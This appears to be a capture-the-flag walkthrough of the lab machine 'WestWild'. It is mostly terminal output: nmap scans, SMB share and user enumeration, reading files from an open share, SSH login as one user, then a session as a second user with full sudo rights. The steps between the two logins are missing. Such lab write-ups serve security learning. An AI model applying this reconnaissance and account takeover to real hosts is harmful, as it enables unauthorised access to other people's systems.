┌──(kali㉿kali)-[~] └─$ sudo nmap --min-rate 10000 -p- 192.168.56.107 Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-25 03:11 EDT Nmap scan report for 192.168.56.107 Host is up (0.00028s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:F6:8C:99 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.02 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.56.107 Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-25 03:11 EDT Nmap scan report for 192.168.56.107 Host is up (0.00031s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 6f:ee:95:91:9c:62:b2:14:cd:63:0a:3e:f8:10:9e:da (DSA) | 2048 10:45:94:fe:a7:2f:02:8a:9b:21:1a:31:c5:03:30:48 (RSA) | 256 97:94:17:86:18:e2:8e:7a:73:8e:41:20:76:ba:51:73 (ECDSA) |_ 256 23:81:c7:76:bb:37:78:ee:3b:73:e2:55:ad:81:32:72 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesnot have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) MAC Address: 08:00:27:F6:8C:99 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: WESTWILD; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.78 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap --script=vuln -p22,80,139,445 192.168.56.107 Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-25 03:12 EDT Nmap scan report for 192.168.56.107 Host is up (0.00024s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server\'s resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities. |_http-csrf: Couldn\'t find any CSRF vulnerabilities. |_http-dombased-xss: Couldn\'t find any DOM based XSS. 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:F6:8C:99 (Oracle VirtualBox virtual NIC)
Host script results: |_smb-vuln-ms10-061: false |_smb-vuln-ms10-054: false | smb-vuln-regsvc-dos: | VULNERABLE: | Service regsvc in Microsoft Windows systems vulnerable to denial of service | State: VULNERABLE | The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference | pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes | while working on smb-enum-sessions. |_
Nmap done: 1 IP address (1 host up) scanned in 320.92 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.56.107 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-25 03:14 EDT Nmap scan report for 192.168.56.107 Host is up (0.000075s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:F6:8C:99 (Oracle VirtualBox virtual NIC)
Host script results: | smb-enum-shares: | account_used: guest | \\192.168.56.107\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (WestWild server (Samba, Ubuntu)) | Users: 2 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.168.56.107\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> | Current user access: <none> | \\192.168.56.107\wave: | Type: STYPE_DISKTREE | Comment: WaveDoor | Users: 0 | Max Users: <unlimited> | Path: C:\home\wavex\wave | Anonymous access: READ/WRITE |_ Current user access: READ/WRITE | smb-enum-users: | WESTWILD\aveng (RID: 1000) | Full name: aveng | Description: | Flags: Normal user account | WESTWILD\root (RID: 1001) | Full name: root | Description: | Flags: Normal user account | WESTWILD\wavex (RID: 1002) | Full name: XxWavexX | Description: |_ Flags: Normal user account
Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
尝试无密码登录,匿名登陆失败,wave 登陆成功
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
┌──(kali㉿kali)-[~] └─$ smbclient //192.168.56.107/anonymous Enter WORKGROUP\kali\'s password: tree connect failed: NT_STATUS_BAD_NETWORK_NAME
┌──(kali㉿kali)-[~] └─$ smbclient //192.168.56.107/wave Enter WORKGROUP\kali\'s password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Jul 30 01:18:56 2019 .. D 0 Thu Aug 1 19:02:20 2019 FLAG1.txt N 93 Mon Jul 29 22:31:05 2019 message_from_aveng.txt N 115 Tue Jul 30 01:21:48 2019
1781464 blocks of size 1024. 285752 blocks available
┌──(kali㉿kali)-[~] └─$ smbget smb://192.168.56.107/wave/FLAG1.txt Password for [kali] connecting to //wave/192.168.56.107: Using workgroup WORKGROUP, user kali smb://192.168.56.107/wave/FLAG1.txt Downloaded 93b in 4 seconds
┌──(kali㉿kali)-[~] └─$ smbget smb://192.168.56.107/wave/message_from_aveng.txt Password for [kali] connecting to //wave/192.168.56.107: Using workgroup WORKGROUP, user kali smb://192.168.56.107/wave/message_from_aveng.txt Downloaded 115b in 1 seconds
┌──(kali㉿kali)-[~] └─$ cat message_from_aveng.txt Dear Wave , Am Sorry but i was lost my password , and i believe that you can reset it for me . Thank You Aveng
┌──(kali㉿kali)-[~] └─$ ssh wavex@192.168.56.107 The authenticity of host '192.168.56.107 (192.168.56.107)' can\'t be established. ED25519 key fingerprint is SHA256:oeuytnbnPest0/m/OtTQyjaFSRv03+EMhBmAX886bsk. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.107' (ED25519) to the list of known hosts. wavex@192.168.56.107\'s password: Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Thu May 25 10:10:12 +03 2023
System load: 0.0 Memory usage: 3% Processes: 92 Usage of /: 77.9% of 1.70GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at: https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019. Last login: Fri Aug 2 02:00:40 2019
wavex@WestWild:~$ whoami wavex wavex@WestWild:~$ ls wave wavex@WestWild:~$ pwd /home/wavex wavex@WestWild:~$ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 08:00:27:f6:8c:99 brd ff:ff:ff:ff:ff:ff inet 192.168.56.107/24 brd 192.168.56.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::a00:27ff:fef6:8c99/64 scope link valid_lft forever preferred_lft forever wavex@WestWild:~$ uname -a Linux WestWild 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:28:33 UTC 2019 i686 athlon i686 GNU/Linux wavex@WestWild:~$ sudo -l [sudo] password for wavex: Sorry, user wavex may not run sudo on WestWild.
wavex@WestWild:/$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.
System information as of Thu May 25 10:19:42 +03 2023
System load: 0.0 Processes: 106 Usage of /: 77.9% of 1.70GB Users logged in: 0 Memory usage: 10% IP address for eth0: 192.168.56.107 Swap usage: 0%
Graph this data and manage this system at: https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019. Last login: Wed Jul 31 19:26:18 2019 from 192.168.59.1 aveng@WestWild:~$ id uid=1000(aveng) gid=1000(aveng) groups=1000(aveng),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),114(lpadmin) aveng@WestWild:~$ whoami aveng aveng@WestWild:~$ sudo -l [sudo] password for aveng: Matching Defaults entries for aveng on WestWild: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aveng may run the following commands on WestWild: (ALL : ALL) ALL